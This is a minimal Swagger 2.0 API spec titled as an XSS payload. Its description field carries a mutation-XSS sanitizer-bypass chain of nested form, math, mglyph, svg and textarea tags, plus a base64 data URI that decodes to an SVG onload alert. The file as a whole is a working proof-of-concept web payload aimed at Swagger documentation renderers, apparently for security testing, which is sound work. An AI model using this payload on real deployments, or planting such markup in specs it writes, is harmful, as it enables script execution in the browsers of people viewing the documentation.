swagger: '2.0'
info:
  title: CSP-Aware Swagger XSS Payload
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea>
    </svg></mtext></mglyph><path id="</textarea><img src="data:text/html;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoJ2J5cGFzcycpPg==">
    </form>
  version: 1.0.0
paths:
  /test:
    get:
      parameters:
        - name: test
          in: query
          type: string
      responses:
        '200':
          description: Test endpoint
